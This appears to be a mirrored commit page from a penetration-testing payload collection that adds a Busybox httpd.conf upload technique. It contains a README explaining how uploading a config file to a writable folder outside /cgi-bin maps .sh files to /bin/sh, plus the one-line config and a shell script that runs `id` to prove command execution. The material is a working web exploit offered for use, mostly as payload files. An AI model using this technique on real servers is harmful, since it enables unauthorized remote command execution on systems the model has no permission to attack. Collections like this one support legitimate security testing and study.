mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-30 08:15:25 +00:00
Merge pull request #32 from Meatballs1/Meatballs1-patch-1
Busybox httpd.conf file upload payload
This commit is contained in:
commit
8403068681
11
Upload insecure files/Busybox httpd.conf/README.md
Normal file
11
Upload insecure files/Busybox httpd.conf/README.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter.
|
||||||
|
|
||||||
|
Details from Busybox httpd.c
|
||||||
|
|
||||||
|
https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60
|
||||||
|
|
||||||
|
> *.php:/path/php # run xxx.php through an interpreter`
|
||||||
|
|
||||||
|
> If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration.
|
||||||
|
|
||||||
|
Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :)
|
1
Upload insecure files/Busybox httpd.conf/httpd.conf
Normal file
1
Upload insecure files/Busybox httpd.conf/httpd.conf
Normal file
@ -0,0 +1 @@
|
|||||||
|
*.sh:/bin/sh
|
@ -0,0 +1,3 @@
|
|||||||
|
echo "Content-type: text/html"
|
||||||
|
echo ""
|
||||||
|
echo `id`
|
Loading…
Reference in New Issue
Block a user